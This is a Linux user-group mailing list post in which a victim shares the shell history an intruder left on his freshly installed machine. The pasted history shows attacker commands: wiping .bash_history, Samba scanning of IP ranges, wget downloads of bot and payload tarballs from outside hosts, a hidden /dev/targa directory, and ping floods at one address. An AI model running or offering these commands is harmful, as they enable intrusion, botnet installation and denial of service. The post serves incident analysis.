I think I have found the answer to my problems. I got into a shell using disc 1 of the installation cds. I switched to super user mode and saw various commands in the history that were not mine. Someone got in earlier this week and did some bad things to my system. Below is the history if anyone is interested in seeing what they were up to. Any explanation of what they did is welcome. It was pretty much a fresh install, so I wiped the disc and I am reinstalling. I think I need to learn much more about security. TOm history rm -rf .bash_history ls -al w cd /tmp/.cfg/ cd samba ./scan 217 139 97 1 ./scan 62 139 217 98 ./serv 67.160.4.66 ./scan 67 139 160 4 ./scan 217 139 0 1 ls -alF cat /etc/issue tar cd /tmp cd sh ls -alF tar -xzvf sh.tgz exit id wget djcc.go.ro/bios.tgz tar -xzvf bios.tgz tar -xzvf bios.tgz ls rm -rf bios.tgz ls ps -aux cat /proc/cpuinfo exit chmod 700 inst chmod +x inst exit mkdir /dev/targa cd /dev/targa wget mihai-doini.org/bot.tgz tar -xzvf bot.tgz exit ping -s -f 203.144.243.10 65500& ping -f -s 203.144.243.10 65500& ping -s -f 203.144.243.10 65500& ls cd / ping -s -f 203.144.243.10 65500& history | more history | vim history -w /tmp/hist.txt _______________________________________________ TCLUG Mailing List - Minneapolis/St. Paul, Minnesota http://www.mn-linux.org tclug-list at mn-linux.org https://mailman.real-time.com/mailman/listinfo/tclug-list